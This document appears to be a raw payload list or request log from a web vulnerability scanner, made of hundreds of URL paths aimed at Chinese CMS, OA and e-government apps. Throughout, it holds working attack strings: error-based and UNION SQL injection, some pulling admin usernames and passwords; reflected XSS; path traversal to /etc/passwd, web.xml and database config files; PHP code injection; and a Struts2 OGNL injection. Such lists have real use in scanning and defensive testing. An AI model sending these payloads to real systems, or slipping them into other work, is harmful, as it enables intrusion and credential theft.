/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3 /design/tabledesign/tabledelete.jsp?TableName=1'%20AND%20(SELECT%206237%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,0x6F6B6A3A6F6B6A,0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'cPnC'='cPnC /detail.asp?id=-306/**/And/**/1=char(106)--&&t= /developer_tools/webresource_list_left_page.aspx /devicemanage.php?NodeID=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15 /devicemanage.php?NodeID=-1+or+1=1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a) /dianping/claim.php?fid=1&_erp=%60A+LEFT+JOIN+%60qb_dianping_content%60+B+ON+A.id=B.id+procedure+analyse(extractvalue(rand(),concat(0x3a,md5(0x7765627363616e))),1)--+-%23 /djnotice/qydjnotice.jsp?cx=1&entname=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(89)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(57)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'rOd'='rOd /do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI /do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc /do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E /do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check /do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype= /docs/Lists.aspx?PinYin=1'%20AND%20CHAR(106)%2bCHAR(58)%3E0%20-- /domcfg.nsf /domlog.nsf /down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin /down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns) /down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) /downLoadFile.action?filePath=/WEB-INF/web.xml /download.action?filename=../../../../../../etc/passwd /download.php?tfile=%5C..%5C..%5Cconfig.php /e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22 /e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22 /e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22 /e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22 /eassso/WEB-INF/web.xml /ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql /edoas2/edoas2_test.jsp /eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=-120'%20OR%20(SELECT%204774%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'BLkR'='BLkR&type_id=3&re=0 /emlib4/format/release/aspx/eml_userwh.aspx /engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23 /enterprise/index.php/admin/index /epaper/admin/advresult.jsp?searchKeys=%27%20and%20extractvalue(1,concat(0x5c,md5(0x41411)))%23 /epaper/admin/showlist.jsp?papername=1%27%20and%20extractvalue(1,concat(0x5c,md5(0x41411))))a%23 /epaper/admin/showresult.jsp?searchKeys=1'%20and%20extractvalue(1,concat(0x5c,md5(0x41411)))%23 /epaper/createcd/createcd.jsp?dowhat=createcd&papername=1%27%20and%20extractvalue(1,concat(0x5c,md5(0x41411)))%23 /epp/LoginServerDo.jsp?userid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&pwd=1 /epp/core/eppquickdesk/eppmsg/eppmsg.jsp?pk_infotype=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(87)%7C%7CCHR(98)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(79)%7C%7CCHR(97)%7C%7CCHR(67)%7C%7CCHR(75)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd /epp/core/eppquickdesk/eppnotice/notice.jsp?pk_infotype=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(109)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(97)%7C%7CCHR(97)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'ohehe'='ohehe /epp/core/public/singleplandetail.jsp?pk=1012'%20AND%201234=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(122)%7C%7CCHR(99)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(3640=3640)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(102)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'eye'='eye /epp/detail/publishinfodetail.jsp?pk_message=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(117)%7C%7CCHR(117)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(98)%7C%7CCHR(98)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'ohe'='ohe /epp/html/nodes/upload/SupdocDo.jsp?areaname=1'%20AND%209387=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(58)%7C%7CCHR(108)%7C%7CCHR(121)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9387=9387)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(99)%7C%7CCHR(58)%7C%7CCHR(121)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'msxd'='msxd&supdocname=1&pk_singleplan=1 /epp/html/nodes/upload/supdoc.jsp?pkcorp=1'%20AND%204310=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(106)%7C%7CCHR(109)%7C%7C(SELECT%20(CASE%20WHEN%20(4310=4310)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(111)%7C%7CCHR(58)%7C%7CCHR(109)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'HdRC'='HdRC /epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml /etc/passwd /examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx /example/ /examples/ /extras/curltest.php?url=file://curltest.php /faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23 /favicon.ico /fbyg/a476%20or%20updatexml(1,concat(0x7e,(md5(0x4124))),0)--%20-.html /fckeditor/ /fckeditor/editor/dialog/fck_about.html/fckeditor/editor/dialog/fck_about.html /feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20-- /feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20-- /feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20-- /fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20-- /file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0 /filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0-- /filemanage/file_memo.aspx?file_id=(select%20char(109)) /files/ /findPortalNewsBycategoryIdAndTopPortalNewsAction.action?bg=background6&categoryId=jms-11&displayMode=wordList&from=index&num=8&picHight=&picWidth=&proportionVal=1&showDate=0&showMore=0&showTitle=0&siteId=../WEB-INF/web.xml%3f&wordSize= /flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20-- /forUI/Person/EmplInfo.aspx?IDCard=1122'%20AND%201=CHAR(106)%20--%20 /forUI/Policy/DO.file?ID='%20or%201=char(106)%20-- /forUI/Policy/showPolicy.aspx?ID=1122'%20and%201=char(106)%20-- /forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E /frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6 /frm/Count.aspx?id=29308%20AND%201=char(106)%20--&type=List /gallery--p,0,1122%20and%200-0---1.html /general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23 /general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1 /general/info/view?kind=0&i9999=-1%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /general/info/view?kind=6&dbpre=k00%20where%201=2%20union%20all%20select%20db_name(),2,CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /general/reportshop/utils/ExecUserDefFormulas.php?formulas=%3C?php%20echo%20md5('webscan');exit();?%3E /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23 /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23 /getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_= /getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n= /getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_= /ggxxlb.aspx?mc=&xh=&qx=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%20233%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(86)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&lx=&lxdm=1 /ggxxlb.aspx?mc=&xh=&qx=1&lx=&lxdm=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(103)%7C%7CCHR(101)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%20233%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd /go.php?a=/go.php/component/1&elements[tips]=%3C%21--%20php%20--%3E%3C%21--%20print(md5(base64_decode(MzYwd2Vic2Nhbg)))%3B%20--%3E%3C%21--%20%2Fphp%20--%3E /goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2 /grad/admin/domain_logo.php /group/group.php?id=1%27webscan_draGxn /group/search.php?keyword=1%3Ciframe%20src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4K%3E /guanli/ /guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20-- /guestbook_reply.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php/login.php?ID=-1'%20UNION%20SELECT%201,2,3,4,md5(0x045154),6,7,8%23 /hetong/3121436149178/a448%20or%20updatexml(1,concat(0x7e,(md5(0x4124))),0)--%20-.html /hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)--/hire/zp_options/showtestquestion?a_testid=-1%20union%20all%20select%20'htm',CAST(CAST(@@version%20AS%20VARCHAR(500))%20AS%20IMAGE)-- /hlp/help.asp?HlpCode=1%27%20AND%208716%3DCONVERT%28INT%2C%28SELECT%20CHAR%28113%29%2bCHAR%28106%29%2bCHAR%28112%29%2bCHAR%28120%29%2bCHAR%28113%29%2b%28SELECT%20%28CASE%20WHEN%20%288716%3D8716%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2bCHAR%28113%29%2bCHAR%28106%29%2bCHAR%28106%29%2bCHAR%2898%29%2bCHAR%28113%29%29%29%20AND%20%27sVMm%27%3D%27sVMm /hlp/help.asp?HlpCode=1'%20and%201=char(106)%20-- /home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1 /home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20-- /house/ProcManage/WebHouse/HousePic.aspx /houtai/ /hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml /htdocs/ /html/ /huangou.php?id=1%20and%201=2%20union%20select%20unhex(hex(concat(0x5e5e5e,version(),0x5e5e5e))),0,0,0,0,0,0,0%20-- /i/dbmgr/resourcebrowser.do?action=download&file=../conf/jdbc.conf /i/dbmgr/resourcebrowser.do?action=downloadquery&file=../conf/jdbc.conf /i/oem/gdyjgrplogin.jsp?opid=1&taskGroup=0&id=%00'%20AND%201398%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281398%3D1398%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28107%29%7C%7CCHR%28107%29%7C%7CCHR%28122%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27HsUO%27%3D%27HsUO /icons/ /icons/index /icons/small/ /icons/small/index /ids/admin/debug/fv.jsp?f=/../../../../../../../../etc/passwd /img/ /inc/ /inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager /inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23 /inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60 /include/ /include/ad.php?id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x5c,md5(1122),0x5c),NULL,NULL,NULL,NULL,NULL,NULL,NULL# /include/common.inc.php?_POST[GLOBALS][cfg_dbname]=1 /include/common.inc.php?allclass[0]=cHJpbnQobWQ1KCIzNjB3ZWJzY2FuIikpO2RpZSgpOw /include/config.properties /include/dialog/config.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E /include/dialog/select_images.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E /include/dialog/select_images_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E /include/dialog/select_media.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E /include/dialog/select_media_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E /include/dialog/select_soft.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E /include/dialog/select_soft_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E /include/dialog/select_templets.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E /include/dialog/select_templets_post.php?adminDirHand=%22/%3E%3C/script%3E%3Cscript%3Ealert(1);%3C/script%3E /include/global/showmod.php?id=9&dbname=met_admin_table%20where%20length(admin_pass)=32--%201 /include/hits.php?met_hits=met_download%20cross%20join%20met_admin_table%20where%20met_download.id=met_admin_table.id%20and%20length(admin_pass)=32%20--%201 /include/interface/uidata.php /include/online.php?jsoncallback=%3Ciframe/onload=alert(/webscan/)%3E /include/thumb.php?x=1&y=/../../../config&dir=config_db.php /include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20-- /index.action?class.classLoader.jarPath=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),%2b%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23webscan=%40org.apache.struts2.ServletActionContext%40getResponse().getWriter(),%23webscan.println(@java.lang.System@getProperty(%22java.vendor.url%22)%2b%22d4f800167a6e317f35454ed9024eb310%22%2b%22http%3A%2f%2fwebscan.360.cn%22),%23webscan.close())(aa)&x[(class.classLoader.jarPath)('aa')] /index.html#/dashboard/file/logstash.json /index.jsp /index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid /index.php/?Itemid=11&option=com_search&searchword=%f6%22%20onmouseover%3dprompt(3312)%20//&task=search /index.php/Index/index/name/$%7B@print(md5(1122))%7D /index.php/Site/article/id/-5724)%20UNION%20ALL%20SELECT%2011,11,11,0x63656461723A66696E643A696969696969,11,11,11,11,11,11,11,11,11%23.html /index.php/Site/listTpl/id/-7266)%20UNION%20ALL%20SELECT%200x63656461723A66696E643A696969696969,NULL,NULL,NULL%23.html /index.php/Site/page/id/-7266)%20UNION%20ALL%20SELECT%200x63656461723A66696E643A696969696969,NULL,NULL,NULL%23.html /index.php/abc-abc-abc-$%7B@exit(md5(118741911))%7D/ /index.php/cms/item-comment?callback=jsonp1380096883458'%22()%26%25%3Cscript%3Eprompt(42873)%3C/script%3E&iid=114&page=1&view_page=1&_=1380096883791&_ajax_request= /index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html /index.php/product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(0x7c,admin_name,0x7c,admin_pw,0x7c,sha1(0x3336307765627363616e))+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19%20and+'1'='1 /index.php/weblinks-categories?id=just_test /index.php?-dauto_prepend_file%3d/etc/passwd+-n /index.php?_COOKIE[cfg][database]=mysql&_COOKIE[cfg][db_host]=localhost&_COOKIE[cfg][db_user]=webscan&_COOKIE[cfg][db_pass]=reer&_COOKIE[cfg][db_name]=db /index.php?a=1%3Cscript%3Ealert(abc)%3C/script%3E /index.php?a=list_type&c=index&m=link&siteid='+and(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,unhex(Hex(cast(v9_admin.username+as+char))),0x27,0x7e)+from+%60phpcmsv9%60.v9_admin+Order+by+userid+limit+0,1)+)+from+%60information_schema%60.tables+limit+0,1),floor(rand(0)*2))x+from+%60information_schema%60.tables+group+by+x)a)+and+'1'%3D'1 /index.php?a=list_type&c=index&m=link&siteid=1'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%23 /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363 /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363 /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363 /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363 /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363 /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363 /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363 /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363 /index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336 /index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336 /index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363 /index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363 /index.php?ac=order&at=list /index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 /index.php?ac=search&at=taglist&tagkey=a%2527 /index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) 